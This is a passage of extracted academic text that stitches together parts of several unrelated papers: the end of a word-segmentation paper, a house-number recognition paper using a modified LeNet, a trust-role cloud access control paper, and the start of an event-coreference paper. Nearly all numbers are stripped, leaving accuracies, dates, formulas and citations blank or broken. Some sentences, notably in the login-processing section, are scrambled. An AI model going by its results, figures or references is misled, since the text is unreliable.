considerably more input than for the other patterns. indeed, the iambic pat- tern is known to pose problems for infants when they start using stress as an effective cue. it is only from roughly months of age that infants successfully segment iambic words (jusczyk et al., b). not surprisingly, the usc doesn’t aid in learning about this pattern because it is completely silent on where stress might fall (and does not noticeably improve segmentation performance to begin with). finally, we can also investigate whether the models that lack the usc nevertheless learn that words contain at most one lexically stressed syl- lable. the bottom-right graph in figure plots the probability assigned by the models to patterns that violate the usc. this includes, for example, the rules word → sylls sylls and word → sylls syllu sylls . note how the probabilities as- signed to these rules approaches zero, indicating that the learner becomes more certain that there are no words that contain more than one syllable with lex- ical stress. as we argued above, this suggests that a bayesian learner can acquire the usc from a mod- est amount of data — it will properly infer that the unnatural patterns are simply not supported by the input. to summarize, by examining the internal . . . . . . . p (s tr e ss o n f ir st ) . . . . . . number of input utterances p (s tr e ss o n s e co n d ) . . . . . . . . . p (u n st re ss e d w o rd ) . . number of input utterances p (v io la te s u s c ) colloc −nophon−stress colloc −phon−stress colloc −nophon−stress−usc colloc −phon−stress−usc figure : evolution of the knowledge the learner acquires on the alex corpus. the red dotted line indicates the empirical type distribution of a specific pattern, and the double-dashed line the empirical token distribution. top-left: stress-initial pattern, top-right: unstressed words, bottom-left: stress-second pattern, bottom-right: patterns that violate the usc. state of the bayesian learners we can characterise how their knowledge about the stress preferences of their languages develops, rather than merely measur- ing how well they perform word segmentation. we find that the iambic pattern that has been observed to pose problems for infant learners also is harder for the bayesian learner to acquire, arguably due to its extremely low token-frequency. conclusion and future work we have presented adaptor grammar models of word segmentation that are able to take advantage of stress cues and are able to learn from phonemic input. we find that phonotactics and stress interact in interesting ways, and that stress cues makes a sta- ble contribution to existing word segmentation mod- els, improving their performance by - % token f- score. we also find that the usc introduced by yang ( ) need not be prebuilt into a model but can be acquired by a bayesian learner from the data. sim- ilarly, we directly investigate the stress preferences acquired by our models and find that for stress-initial and unstressed words, they track type rather than token frequencies. the rare stress-second pattern seems to require more input to be properly acquired, which is compatible with infant development data. an important goal for future research is to eval- uate segmentation models on typologically different languages and to study the relative usefulness of dif- ferent cues cross-lingually. for example, languages such as french lack lexical stress; it would be inter- esting to know whether in such a case, phonotactic (or other) cues are more important. relatedly, recent work such as börschinger et al. ( ) has found that artificially created data often masks the com- plexity exhibited by real speech. this suggests that future work should use data directly derived from the acoustic signal to account for contextual effects, rather than using dictionary look-up or other heuris- tics. in using the alex corpus, for which good qual- ity audio is available, we have taken a first step in this direction. acknowledgements this research was supported by the australian research council’s discovery projects funding scheme (project numbers dp and dp ). we’d like to thank professor dupoux and our other colleagues at the laboratoire de sciences cognitives et psycholinguistique in paris for hosting us while this research was per- formed, as well as the mairie de paris, the fondation pierre gilles de gennes, the ecole des hautes etudes en sciences sociales, the ecole normale supérieure, the region ile de france, the european research council (erc- -adg- boot- phon), the agence nationale pour la recherche (anr- -blan- - bootlang, anr- -idex- - and anr- -labx- ) and the fondation de france. we’d also like to thank three anonymous reviewers for helpful comments and suggestions. references n. bernstein-ratner. . the phonology of parent- child speech. in k. nelson and a. van kleeck, editors, children’s language, volume . erlbaum, hillsdale, nj. benjamin börschinger, katherine demuth, and mark johnson. . studying the effect of input size for bayesian word segmentation on the providence cor- pus. in proceedings of the th international con- ference on computational linguistics (coling ), pages – . coling organizing committee. benjamin börschinger, mark johnson, and katherine de- muth. . a joint model of word segmentation and phonological variation for english word-final /t/- deletion. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – . association for computational linguistics. m. brent. . an efficient, probabilistically sound algorithm for segmentation and word discovery. ma- chine learning, : – . m. christiansen and s. curtin. . the power of sta- tistical learning: no need for algebraic rules. in pro- ceedings of the st annual conference of the cogni- tive science society. morten h christiansen, joseph allen, and mark s sei- denberg. . learning to segment speech using multiple cues: a connectionist model. language and cognitive processes, ( - ): – . suzanne curtin, toben h mintz, and morten h chris- tiansen. . stress changes the representational landscape: evidence from word segmentation. cog- nition, ( ): – . anne cutler and david m carter. . the predomi- nance of strong initial syllables in the english vocabu- lary. computer speech and language, ( ): – . anne cutler, jacques mehler, dennis norris, and juan segui. . the syllable’s differing role in the seg- mentation of french and english. journal of memory and language, ( ): – . anne cutler. . lexical stress. in david b. pisoni and robert e. remez, editors, the handbook of speech perception, pages – . blackwell pub- lishing. k. demuth, j. culbertson, and j. alter. . word- minimality, epenthesis, and coda licensing in the ac- quisition of english. language and speech, : – . gabriel doyle and roger levy. . combining mul- tiple information types in bayesian word segmenta- tion. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – . association for computational linguistics. victoria fromkin, editor. . linguistics: an intro- duction to linguistic theory. blackwell, oxford, uk. sharon goldwater, tom griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in y. weiss, b. schölkopf, and j. platt, editors, advances in neural information processing systems , pages – . mit press. sharon goldwater, thomas l. griffiths, and mark john- son. . a bayesian framework for word segmen- tation: exploring the effects of context. cognition, ( ): – . sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. mark johnson and katherine demuth. . unsu- pervised phonemic chinese word segmentation using adaptor grammars. in proceedings of the rd in- ternational conference on computational linguistics (coling ), pages – . coling organiz- ing committee. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in proceedings of human language technolo- gies: the annual conference of the north amer- ican chapter of the association for computational linguistics, pages – . association for compu- tational linguistics. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for spec- ifying compositional nonparametric bayesian models. in b. schölkopf, j. platt, and t. hoffman, editors, ad- vances in neural information processing systems , pages – . mit press, cambridge, ma. mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of the tenth meeting of acl special interest group on computational morphology and phonology, pages – . association for computational linguistics. mark johnson. b. using adaptor grammars to identify synergies in the unsupervised acquisition of linguistic structure. in proceedings of the th annual meeting of the association of computational linguis- tics, pages – . association for computational linguistics. peter w jusczyk, anne cutler, and nancy j redanz. . infants’ preference for the predominant stress patterns of english words. child development, ( ): – . peter w. jusczyk, e. a. hohne, and a. bauman. a. infants’ sensitivity to allophonic cues for word seg- mentation. perception and psychophysics, : – . peter w. jusczyk, derek m. houston, and mary new- some. b. the beginnings of word segmentation in english-learning infants. cognitive psychology, ( - ): – . peter jusczyk. . the discovery of spoken language. mit press, cambridge, ma. myron korman. . adaptive aspects of maternal vo- calizations in differing contexts at ten weeks. first language, : – . constantine lignos and charles yang. . reces- sion segmentation: simpler online word segmentation using limited resources. in proceedings of the four- teenth conference on computational natural lan- guage learning, pages – . association for com- putational linguistics. constantine lignos. . modeling infant word seg- mentation. in proceedings of the fifteenth conference on computational natural language learning, pages – . association for computational linguistics. constantine lignos. . infant word segmentation: an incremental, integrated model. in proceedings of the west coast conference on formal linguistics . brian macwhinney. . the childes project: tools for analyzing talk: volume i: transcription format and programs, volume ii: the database. computational linguistics, ( ): – . sven l mattys and peter w jusczyk. . phonotac- tic cues for segmentation of fluent speech by infants. cognition, ( ): – . sven l mattys. . the perception of primary and secondary stress in english. perception and psy- chophysics, ( ): – . lisa pearl, sharon goldwater, and mark steyvers. . online learning mechanisms for bayesian models of word segmentation. research on language and com- putation, ( ): – . elisabeth o. selkirk. . phonology and syntax: the relation between sound and structure. mit press. erik d thiessen and jenny r saffran. . when cues collide: use of stress and statistical cues to word boundaries by -to -month-old infants. developmen- tal psychology, ( ): . erik d thiessen and jenny r saffran. . learning to learn: infants acquisition of stress-based strategies for word segmentation. language learning and develop- ment, ( ): – . carnegie mellon university. . the cmu pronounc- ing dictionary, v. . a. charles yang. . universal grammar, statistics or both? trends in cognitive sciences, ( ): – . none paper title (use style: paper title) doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , street view house number identification based on deep learning yang haoqi school of computer science and engineering xi’an technological university xi’an, china e-mail: curioyhq@gmail.com yao hongge school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—in this paper, the difficult problem of character recognition in natural scenes caused by many factors such as variability of light in the natural scene, background clutter and inaccurate viewing angle, and inconsistent resolution. based on the deep learning framework pytorch, a convolutional neural network is implemented. based on the classic lenet- network, the network optimizes the input layer to accept three-channel images, changes the pooling method to maximum pooling to simplify parameters, and the activation function is replaced by rectified linear unit with faster convergence. the cross- entropy loss is used instead of the minimum mean square error to mitigate the slow learning. furthermore, we also enroll the gradient descent optimization algorithm rmsprop and l regularization to improve the accuracy, speed up the convergence and suppress the over-fitting. the experiment results show that our model achieved an accuracy of . % after training for h min on the street view house number(svhn) dataset, effectively improving the performance of lenet- . keywords-house number identification; convolutional neural network; lenet- i. introduction the traditional method of classifying house numbers from natural scene images is usually to use manual feature extraction[ - ] and template matching[ - ]. in order to identify the house number of the corridor environment, zhang shuai et al. used the combination of robert edge detection and morphological operation to locate the position of the house number image, and then divide the house number by horizontal and vertical projection method, tilt correction, etc., and finally use pattern recognition to identify the house number [ ]. ma liling et al. used the linear discriminant linear local tangent space alignment algorithm (odlltsa) and the support vector machine (svm) method to identify the house number, use the extracted features to train the svm classifier, and use the svm classifier to the new house number classification [ ]. for these traditional methods, the key to determining their performance is to have a good classifier, and the features in the classifier are mostly designed manually (such as sift, surf, hog, etc.), and the features of the artificial design are well interpreted. however, in the face of complex backgrounds, changing fonts and various deformations, it is rather troublesome and difficult to extract more general features[ ]. the convolutional neural network (cnn) is a multi-layered supervised learning neural network. although the training process requires a large amount of data compared with the traditional method, the convolutional neural network can automatically summarize the target feature from these data. features do not require human intervention. overcome the shortcomings of manual design features that are time- consuming and labor-intensive, have poor general use and require high experience in the designer field. it is precise because of these advantages of convolutional neural networks that a large number of researchers have begun to apply it to solve character recognition problems. in response to this situation, we implemented a lenet- -based neural network based on the deep learning framework pytorch and achieved an accuracy of . % on the svhn dataset at a time of hours and minutes. ii. related work a. network structure the network used in this experiment is modified by lenet- as shown in figure . lenet- appeared to solve the problem of recognition of handwritten characters. the data set used in the training process is the mnist. the samples in the data set are single- international journal of advanced network, monitoring and controls volume , no. , channel grayscale images, and the street view dataset is the three-channel color picture, to improve the robustness of the model, minimize the intervention on the original data set, we do not pre-process it, such as grayscale, but choose to adjust the input layer of lenet- to three channels. figure . network structure the pooling layer in the original lenet- network is very different from the currently recognized pooling layer operation, so we replace it directly with the max- pooling layer, which on the other hand reduces the number of trainable parameters of the network. it is conducive to controlling the scale of the network and speeding up the training. in terms of the activation function, the activation function in the original lenet- is sigmoid or tanh. here we use a rectified linear unit (relu) with faster convergence speed and no significant impact on the generalization accuracy of the model. lenet- 's loss function is minimum mean squared error:    where is the number of samples, represents the predicted value of the ith sample, and is the labelof the th sample. in the case of back-propagation by the gradient descent method, the minimum mean square error is easy to occur when the neuron output is close to ‘ ’ and the gradient is too small to learn slow. we use the cross-entropy loss function here:    in addition to the above improvements, we will introduce four optimization algorithms, sgd (with momentum), adam, adamax, and rmsprop. b. comparison effects of different optimizers the package ‘torch.optim’ in pytorch encapsulates a large number of optimization algorithms, which are often referred to as optimizers. in figure , we take the more common sgd, adam, adamax and rmsprop optimizers according to the parameters listed in table .after epochs training, compare their optimization effects on the svhn dataset used in the improved lenet- network proposed in this paper. it can be seen from figure that the network using the sgd optimizer has almost no improvement in the test set accuracy in the first epoch, and the th epoch only starts to rise significantly; the network using the other three optimizers is in the toptenepochs, a good test set accuracy rate is obtained, and the test set accuracy of the network using the rmsprop optimizer is the fastest. so in the next experiment, we will use rmsprop as the default optimizer. table i. optimizer parameter setting optimizer parameter sgd lr= . , adam lr= . , adamax lr= . , rmsprop lr= . , figure . optimizer effect it can be observed from figure that the accuracy of the test set except the sgd optimizer is not improved much in the later stage of training, and the accuracy of the test set of the other three networks even shows a small downward trend. table shows the statistics in figure . the data of test sets with high accuracy rate, the difference ofhighest accuracy rate on the svhn test set is only . %, which can be considered as the optimization effect of the four optimizers on the accuracy rate; from the position of the highest test set accuracy, only the th epoch appears in the network using the sgd optimizer. the highest test set accuracy of the network using the other three optimizers is relatively high, indicating that theperformanceofthese three optimizers in the latter part of the trainingdecreased. it may be that the international journal of advanced network, monitoring and controls volume , no. , network has been over-fitting, and it is necessary to introduce evaluation and avoid over-fitting. table ii. optimizers training results optimizer top accuracy/% sgd . adam . adamax . rmsprop . c. comparison of the application of l regularization with the appropriate weight attenuation coefficient in the face of possible over-fitting, one possible inhibitory measure is the introduction of regularization. we first use the l regularization and introduce the training set accuracy rate, training set loss, test set loss three indicators to enrich the evaluation results of the experimental results. the experimental design is shown in table . the default optimizer is rmsprop (lr= . , alpha= . ), the maximum iteration number is still set to epoch, and the l pooling corresponding weight attenuation coefficient (weight_decay) is the best and the best. the resulting position is shown in table , and the corresponding accuracy and loss curves are shown in figure - . it can be seen from table and figure that the training set loss curves show a smooth downward trend under the four values of the weight attenuation coefficient. comparing the training set accuracy rate of figure with the test set accuracy rate of figure , it can be seen that the accuracy rate under the corresponding weight attenuation coefficient is about % up and down, within an acceptable range, but the weight attenuation coefficient in figure is the loss curve of the test set at . is firstly decreased and then increased. this indicates that the over-fitting phenomenon appears under this parameter, which indicates that the improved lenet- network proposed in this paper is attenuated by the weight of . when training on the svhn dataset. the coefficient can not suppress the over-fitting, we should choose a higher weight attenuation coefficient; from table , we can see that the data with the weight attenuation coefficient of . is better than the weight attenuation coefficient of . and . . on the accuracy curve of the test set in figure , the curve with the weight attenuation coefficient of . is higher than the curve with the weight attenuation coefficient of . and . , and the weight attenuation coefficient is . in the later stage of the training process. more obvious and less shocking. the above analysis shows that among the selected four sets of weight attenuation coefficients, the weight attenuation coefficient of . can avoid over-fitting and achieve better training results. table iii. result of different weight decay weight_decay train acc%(e) test acc%(e) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) . . ( ) . ( ) figure . training accuracy of different regularization figure . training loss of different regularization international journal of advanced network, monitoring and controls volume , no. , figure . test accuracy of different regularization figure . tetst loss of different regularization iii. experiment and analysis a. svhn(the street view house numbers) currently, for the identification task of the street view number, the better public data set is the svhn data set. the svhn dataset is a real-world image dataset focused on the development of machine learning and target detection algorithms with minimal need for data preprocessing and format conversion. there are ten types of labels in the dataset. each class represents number. for example, the category label of the number " " is , and so on. the label of " " is , and the label of " " is . in general, the svhn dataset contains three subsets: training set, test set, and extended set; the data set is divided into two formats based on the difficulty of recognition: a character-level bounding box containing the entire house number and a small number of wall backgrounds. the full resolution image (figure ); a x pixel centered on a single number similar to the mnist dataset format image (figure ). the latter style is highly similar to the classic mnist dataset, but is larger and more difficult to identify: the training set consists of , hard-to- recognize digital images, and the test set consists of , digital images, with an additional set of . a simpler digital image that can be used to extend the test set. unless otherwise stated, the svhndataset mentioned later in this article refers to the dataset in the format after cropping. figure . svhn-complete house number figure . svhn-part number b. data augmentation augmenting the data set is also an effective means to improve the accuracy of the model. the size of each subset of the svhn dataset is shown in table , where the extension set official mentions that it can be used to extend the training data. figure - shows a small number of samples and their labels in each subset. it international journal of advanced network, monitoring and controls volume , no. , can be seen that the resolution and brightness of the extended set are high and the background interference is small. the human eye recognition is indeed higher than the training set and test set, that is, it is said that the recognition of the extended set is relatively difficult, but the addition of the extended set can make the training set expand to . times, which is still expected to improve the accuracy of the model. figure shows the distribution of the original training set, extension set and test set (" " for the number , " " for the number , ..., " " for the number ), which can be seen in the three sub-categories the proportional distribution of each category is approximated, so the distribution of the new training set incorporating the extended set is similar to the distribution of the original training set. this correlation helps to suppress the disadvantages brought by the introduction of the extended set to the model training. influences. table iv. augmentation result subset category number of samples training set extra set test set figure . example of train set figure . example of extra set figure . example of test set figure . category distribution of svhn the effect of epoch training before and after the introduction of the extended set is shown in table and figure . one point that needs to be specially stated is that the visualization tool visdom we use has an automatic zoom function when drawing, which automatically hides the blank area of auto-hide the chart. therefore, the different training sets in figure correspond to the vertical axis starting position and scaling of the chart. it's the same. the accuracy of the training set is lower than % and the loss curve of the test set shows a downward trend, indicating that there is no over-fitting phenomenon after expanding the data set; the accuracy of the test set is gradually reduced in the later period. the small description model tends to converge, and it can be seen that the model after the extended training set is higher than the extended training set. from table , it can be seen that the training time after the expansion of the training set is hours and minutes, and the best accuracy rate is increased by . % compared with the expansion. table v. result after data augmentation train sample number test sample number best test accuracy time . h min . h min figure . training of the model after adding data augmentation international journal of advanced network, monitoring and controls volume , no. , figure . figure test result iv. conclusion the convolutional neural network applied in the svhn dataset to improve the classic lenet- network is: ( ) modify the input layer to accept three-channel images; ( ) switch to the more commonly used maximum pooling and activation function, loss function; ( ) introduction of gradient descent optimization algorithm rmsprop; ( ) use l regularization. the seven-layer convolutional neural network implemented in this paper achieves direct processing of color pictures without complicated preprocessing, which improves the versatility of the model, speeds up the training and effectively avoids over-fitting. in the end, both the training speed and the prediction accuracy are better than the domestic ma miao and others based on the experimental results of the improved lenet- . after expanding the dataset, i tried to run a maximum of epoch, and there was no obvious improvement in the test accuracy. therefore, the future improvement direction should still be based on the principle. we can consider deepening the network level to obtain more abundant features. references [ ] mori s, suen c y, yamamoto k. historical review of ocr research and development. proceedings of the ieee, , ( ): - . [ ] plamondon r, srihari s n. online and off-line handwriting recognition: a comprehensive survey. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] de campos t e, babu b r, varma m. character recognition in natural images. visapp ( ), , . [ ] yamaguchi t, nakano y, maruyama m, et al. digit classification on signboards for telephone number recognitio. ieee, : . [ ] zhang shuai, su shi-tao. doorplate identification for mobile robot in hallway based on morphological. modern electronics technique, , ( ): - + . [ ] ma li-ling. an algorithm based on odlltsa and svm classier for door plate number recognition. journal of central south university (science and technology), , : . [ ] zhou cheng-wei. recognition of numbers in natural scene with convolutional neural network.computer technology and development, . international journal of advanced network, monitoring and controls volume , no. , research on trust-role access control model in cloud computing yuchen wu school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com pingping liu school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—in order to ensure the security of data in cloud computing, a trust-role-based hybrid cloud computing access control model is proposed based on the combination of role-based and trust-based access control models. the model introduces the calculation of trust based on the role-based access control, that is, the user needs to verify the trust value in order to obtain the permission to access the data. through the application in the local business system, it shows that the model can effectively solve the user's legitimate access to the data in the cloud, that is, to protect the security of the data in the cloud. the trust-based access control model has good advantages in terms of system throughput and storage space. as the number of user requests increases, both access control methods increase significantly in terms of throughput, but when the number of user requests reaches , the system throughput of both access control methods decreases, but based on trust - the role's access control method is always larger than the role-based access control method in terms of throughput, which roughly increases the total amount by about ten percent. keywords-cloud computing access control; data security; trust value i. introduction cloud computing[ ] is a commercial implementation of distributed processing, parallel processing, and grid computing development; its main features are large scale, virtualizable, high reliability, high scalability, and on-demand services. in a cloud environment, various resources are dynamically connected to the internet, users can not only apply for services, but all participants in the cloud environment can dynamically join or quit[ ]. however, with the popularization of cloud computing, cloud computing service security failures occur frequently, and the cloud security issues involved are increasingly prominent. for example, data stored in the cloud makes users have no absolute control over it, and cannot guarantee data integrity and confidentiality. sex, and cloud service providers have some degree of untrustworthiness, etc., and this potential data security problem constrains cloud computing. development in archival data management, and access control is one of the main means to solve data security problems. by studying several traditional access control methods, this paper introduces the concept of subject trust in the role-based access control method, and proposes a hybrid access control method based on "trust-role". the experiment proves that the method is to a certain extent. it can improve the credibility of the system, reduce the probability of task execution failure and spoofing, effectively solve the access of illegal users to resources and the unauthorized access of legitimate users, and ensure the integrity and confidentiality of data in the cloud. doi: . /ijanmc- - mailto: @qq.com mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , ii. traditional access control a. autonomous access control and mandatory access control autonomous access control[ ] is an access control policy based on subject authorization. this method is autonomous, but it makes the authority of the subject too powerful and the security level of the system is low. in the mandatory access control, the system's main body and object are given certain security attributes by the system administrator, and the subject cannot modify its own security attributes. however, its lack of flexibility and lack of consideration for authorization management are generally not used in large distributed environment systems. b. role-based access control method in the role-based access control (rbac) model, the concept of “role” is introduced[ ]. the main idea is to separate the subject from the object. the access rights are not directly directed to the subject and the object, but are assigned to the role. this “user-role-privilege” relationship makes the access control method more flexible. however, as the number of roles increases, the relationship between the roles becomes more complicated, which reduces the security of the system in the case of affecting system performance. furthermore, this passive security model is not well suited for distributed environments[ ]. iii. hybrid access control based on "trust-role" model a. introduction of trust trust[ ] is an assessment of the identity and activity of the subject and the activity in the system, and is closely related to its own reliability and integrity. based on the role-based access control model, the concept of “trust” is introduced. when the subject tries to access the object resources, not only the role verification but also the trust value is calculated. system data is made more secure by trust and role double-layer verification. the acquisition of trust value[ ] mainly has three aspects: direct trust degree, recommendation trust degree and historical operation trust degree. the direct trust degree is obtained through the subject's identity verification and user authority. the recommendation trust degree is mainly based on other subjects and object resources. the recommendation information is calculated, and the historical operation trust degree is the behavior record accumulated by the subject in the historical access to the object resource process. b. basic concept description of the model definition entity user: access data in a cloud computing environment. the subject of the resource, recorded as u; definition role: the role is equivalent to the employee in the actual enterprise role, recorded as r; definition trust degree: trust degree is the degree of trust of the subject to other subjects. in this model, the value of trust is [- , ]. the greater the trust value, the higher the access rights of the subject; definition access rights: the power of the subject to access the system data resources. depending on the role assigned to the subject, the subject has different permissions; definition credibility threshold: the credibility threshold is a fixed value defined. when determining the trust value of an entity user, it needs to be compared with the minimum trust threshold. if the current trust value of the entity user is greater than the minimum trust threshold, then the next step can be accessed, otherwise, the access cannot be continued; definition session: a session is an event process that is triggered when an entity user activates a role they own. the real user can activate multiple roles in one session, denoted as s. c. calculation of trust values in a cloud computing environment, when a principal user requests a resource access, the credibility international journal of advanced network, monitoring and controls volume , no. , management center shall calculate the credibility of the user. in the calculation, if the credibility is greater than a certain credibility threshold, the authorization center can assign the corresponding role to the user, and the user can access the object resource. in this model, trust includes: direct trust recommended trust and historical operational trust. ) direct trust (dt) the acquisition of direct trust is calculated based on the identity verification and user rights of the subject and the environment information; when the user logs in to the system for the first time, the system administrator must provide his or her identity information and environment information. the system administrator will calculate the direct trust of the user based on the information. the formula is:  where r(i, s), r(p, s), r(e, s) are the correlations between the identity information, rights, environmental information and system security of the entity user determined by the security administrator, respectively, is the weight of identity information, authority, and environmental information in direct trust. ) historical operation trust (ht) historical operational trust is a record of behavior accumulated by the subject user during historical access to the guest resource. the access of the main user to the resource is divided into normal access and abnormal access. a normal access is an access request that meets a system security rule that is filed within a specified time period, while a non-normal access is an access request that violates a system security rule that is filed within a specified time. when the user is performing normal resource access request behavior then the user's historical operation trust is improved, and the historical operation trust is reduced. its calculation formula:   where h(m,i,t) is the trust value of the access of the subject user m to the guest resource at time t . is the definition coefficient for this access.if it is a normal access, vi takes a positive value, and if it is an abnormal access, it takes a negative value. ) recommended trust (rt) the recommended trust degree is the recommended trust degree of the main user to other main users. generally, the recommendation trust degree of one user to another user can refer to the recommendation trust degree of other users. its calculation formula:   where s(m,i)i is the degree of satisfaction of the entity m with respect to the entity n at the ith operation, and d(m,i)i is the score of the entity m for the entity n at the ith operation. ) calculation of final trust (ft) the ultimate trust is the direct trust available based on previous calculations. the sum of the degree of trust in the historical operation and the recommended trust degree, the weights of the three trust degrees are wdt, wht, wrt, and the sum of the three weights is equal to . the final trust is calculated as:   d. trust-role-based access control algorithm when the user makes a request to access the resource, the cloud computing authorization center creates a session s for the subject user by verifying the information of the subject user, establishes a trust relationship between the system and the subject user u, and calculates the trust degree of the subject user u, the subject user. u select the role to be activated in this international journal of advanced network, monitoring and controls volume , no. , session. the system applies the credibility of the user u to the access rights of the role according to the trust constraint conditions, and obtains the current effective access rights of the subject user. the specific algorithm steps are as follows: ) when the entity user needs to access the resource, first submit the account and password that he has logged in and the data resource that needs to be requested to the cloud computing authorization center; ) the cloud computing authorization center checks the information submitted by the entity user, determines whether to establish a session, and if so, establishes a session between the system and the user, and forwards the information submitted by the user to the cloud computing role database; ) the cloud computing role database determines the role that the user needs according to the information sent by the authorization center, assigns the role to the user, and forwards the information to the cloud computing trust value database; ) the cloud computing trust value database determines whether to grant the authority to the role assigned to the user according to the current trust value of the user. if the current trust value of the user is greater than a predetermined minimum threshold, the authority is given, otherwise reject and return this information to the cloud computing authorization center; ) after the cloud computing authorization center saves the information of the cloud computing trust value database, it will return an authorization success certificate to the user, and the user can carry the authorization success certificate to access the resource database. after the resource database is checked, the user can access the information. data resources that need to be accessed; ) after the conclusion of the meeting, users and sources shall evaluate the satisfaction of the parties and submit the results to the trust value database for calculation and update of the trust value. iv. based on the "trust-role" access control model application aiming at the security problem of cloud environment, this paper introduces the trusted mechanism into the traditional access control mode, proposes the access control model based on trust-role, and conducts experiments in the local business system. the cloud platform is built through hadoop architecture. firstly, the local database is migrated to the distributed data base hbase, and then the access control model is applied in the local business system. in other words, the user's identity, credibility and other information are verified at the same time. finally, the advantages of this model in system throughput and data storage cost are obtained through simulation experiments. a. construction of hadoop cloud platform ) install linux virtual machine install the vmware workstation and install the linux virtual machine. the linux system is ubun-tu . . ) install jdk install the jdk - u - linux - i . bin, and set its environment variable. ) configure ssh password-free login installation command:$ sudo apt-get install ssh ) install hadoop, zookeeper and hbase take hadoop- separately. . . the tar. gz, the zookeeper - . . . the tar. gz, hbase - . . . the tar. three files of gz are decompressed and put into the target document folder, then the environment variables of hadoop are configured, and the configuration files of hadoop, zookeeper and hbase are modified respectively. b. application of the model in local business systems ) system flow chart shown in figure international journal of advanced network, monitoring and controls volume , no. , figure . business system flowchart ) system user login processing the user to enter your login account and password, login request to the server, the server receives the request, after looking for value table with a table and trust, and find the attribute information, the user first line into the user name and password match, if the match is successful, by the trust of the user id to find its corresponding value, through the three kinds of trust value calculated finally trust value, compared with the threshold of system setting, if not smaller than the threshold, through carries on the angle of color reflected beam, root, according to the angle of color not to grant to the users of different operating as xu can, and the number of interchanges will be increased by , the new user's trust value; if it fails, the user is unable to log in, and according to the user id, the number of non-normal operations is increased by , and the new letter value is obtained. the user login interface is shown in figure . figure . business system login interface c. simulation experiment simulation experiments mainly compare the access control model based on "trust-role" and the access control model based on role from the aspects of system throughput and data storage cost. see figure and figure . figure shows the storage space comparison required for the two access control methods to store access control information, indicating that the amount of storage space required for the trust-based access control method does not increase significantly as the number of users increases. figure . storage space comparison chart international journal of advanced network, monitoring and controls volume , no. , figure . system throughput comparison chart figure shows a comparison of the system throughput between the two access control methods, showing that both access control methods increase significantly in throughput as the number of user requests increases. however, when the number of user requests reaches , the system throughput of both access control methods is decreasing, but the trust-based access control method is always larger in throughput than the role-based access control method. v. conclusion this paper adds the concept of credibility to the traditional role-based access control model, and proposes a hybrid-access-based hybrid access control model in cloud computing. this model makes up for the shortcomings of role-based access control methods. experiments show that this model has great advantages in system user authentication, and the trust-based access control model has good advantages in system throughput and storage space. acknowledgment new network and inspection and control national local joint engineering lab. fund project (gsysj ) http://www.ijanmc.org references [ ] li qiao, zheng xiao. summary of the status quo of cloud computing research [j]. computer science, , ( ): - . [ ] chen quan, deng qianni. cloud computing and its key technologies [j]. computer application, , ( ): - . [ ] long qin, liu peng, pan aimin. role-based extension manageable access control model research and implementation [j]. computer research and development, , ( ): - . [ ] luo xueping, zheng yuli, xu guoding. an extended role-based access control model [j]. computer engineering, , ( ): - . [ ] liao junguo, hong fan, xiao haijun, et al. fine-grained role-based access control model [j]. computer engineering and applications, , ( ): - . [ ] deng yong, zhang lin, wang weichuan, et al. research on dynamic role access control based on trust degree in grid computing [j]. computer science, , ( ): - . [ ] lin qingguo, liu yanbing. a trust-based dynamic access control strategy [j]. journal of chongqing university of posts and telecommunications (natural science edition), , ( ): - . a hierarchical distance-dependent bayesian model for event coreference resolution bishan yang claire cardie department of computer science cornell university {bishan, cardie}@cs.cornell.edu peter frazier school of operations research and information engineering cornell university pf @cornell.edu abstract we present a novel hierarchical distance- dependent bayesian model for event coref- erence resolution. while existing generative models for event coreference resolution are completely unsupervised, our model allows for the incorporation of pairwise distances be- tween event mentions — information that is widely used in supervised coreference mod- els to guide the generative clustering process- ing for better event clustering both within and across documents. we model the distances between event mentions using a feature-rich learnable distance function and encode them as bayesian priors for nonparametric cluster- ing. experiments on the ecb+ corpus show that our model outperforms state-of-the-art methods for both within- and cross-document event coreference resolution. introduction the task of event coreference resolution consists of identifying text snippets that describe events, and then clustering them such that all event mentions in the same partition refer to the same unique event. event coreference resolution can be applied within a single document or across multiple documents and is crucial for many natural language process- ing tasks including topic detection and tracking, in- formation extraction, question answering and tex- tual entailment (bejan and harabagiu, ). more importantly, event coreference resolution is a neces- sary component in any reasonable, broadly applica- ble computational model of natural language under- standing (humphreys et al., ). in comparison to entity coreference resolu- tion (ng, ), which deals with identifying and grouping noun phrases that refer to the same dis- course entity, event coreference resolution has not been extensively studied. this is, in part, because events typically exhibit a more complex structure than entities: a single event can be described via multiple event mentions, and a single event mention can be associated with multiple event arguments that characterize the participants in the event as well as spatio-temporal information (bejan and harabagiu, ). hence, the coreference decisions for event mentions usually require the interpretation of event mentions and their arguments in context. see, for example, figure , in which five event mentions across two documents all refer to the same under- lying event: plane bombs yida camp. event: plane bombs yida camp document document the {yida refugee camp} {in south sudan} was bombed {on thursday}. the {yida refugee camp} was the target of an air strike {in south sudan} {on thursday}. {two bombs} fell {within the yida camp}, including {one} {close to the school}. {at least four bombs} were reportedly dropped.{four bombs} were dropped within just a few moments - {two} {inside the camp itself }, while {the other two} {near the airstrip}. figure : examples of event coreference. mutually coreferent event mentions are underlined and in boldface; participant and spatio-temporal information for the high- lighted event is marked by curly brackets. most previous approaches to event coreference resolution (e.g., ahn ( ), chen et al. ( )) op- erated by extending the supervised pairwise classi- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. fication model that is widely used in entity corefer- ence resolution (e.g., ng and cardie ( )). in this framework, pairwise distances between event men- tions are modeled via event-related features (e.g., that indicate event argument compatibility), and ag- glomerative clustering is applied to greedily merge event mentions into clusters. a 